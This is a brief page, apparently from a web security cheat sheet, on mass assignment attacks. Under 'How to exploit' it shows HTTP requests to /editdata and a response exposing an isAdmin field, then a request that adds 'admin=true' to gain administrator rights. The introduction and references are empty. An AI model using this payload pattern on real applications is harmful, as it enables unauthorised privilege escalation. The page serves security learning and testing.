Mass Assignment Attack
Introduction
How to exploit
POST /editdata HTTP/1.1
Host: target.com
...
username=daffaHTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"false"}POST /editdata HTTP/1.1
Host: target.com
...
username=daffa&admin=trueReferences
Last updated